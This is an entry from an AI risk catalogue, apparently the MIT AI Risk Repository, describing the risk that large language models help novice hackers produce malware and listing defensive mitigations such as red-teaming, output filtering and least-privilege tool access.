4. Malicious Actors & Misuse2 - Post-deployment

Security

Though chatbots cannot (yet) develop their own novel malware from scratch, hackers could soon potentially use the coding abilities of large language models like ChatGPT to create malware that can then be minutely adjusted for maximum reach and effect, essentially allowing more novice hackers to become a serious security risk

Source: MIT AI Risk Repositorymit514

ENTITY

1 - Human

INTENT

1 - Intentional

TIMING

2 - Post-deployment

Risk ID

mit514

Domain lineage

4. Malicious Actors & Misuse

223 mapped risks

4.2 > Cyberattacks, weapon development or use, and mass harm

Mitigation strategy

1. Prioritize Model Hardening through Adversarial Training: Continuously conduct targeted adversarial training and red-teaming exercises to expose the Large Language Model (LLM) to simulated attack scenarios designed to elicit malicious code generation, thereby improving model alignment and resilience against known and emerging jailbreaking techniques (Sources 2, 5, 11). 2. Implement Multi-Layered Output Sanitization and Filtering: Deploy automated, context-aware content moderation and postprocessing filters to strictly audit, sanitize, and block generated outputs that contain unsafe code snippets, common malware binaries, suspicious command sequences, or instructions capable of leading to security breaches, ensuring that model responses are treated as untrusted data (Sources 2, 6, 7, 11). 3. Enforce Strict Tool-Use Restrictions and Least Privilege: Apply the principle of least privilege by strictly limiting the LLM's functional capabilities and agentic access to external tools and systems. High-risk operations, such as code execution, modification of records, or initiation of transactions, must be restricted, require explicit human-in-the-loop validation, or be isolated within sandboxed environments (Sources 5, 7, 9, 13).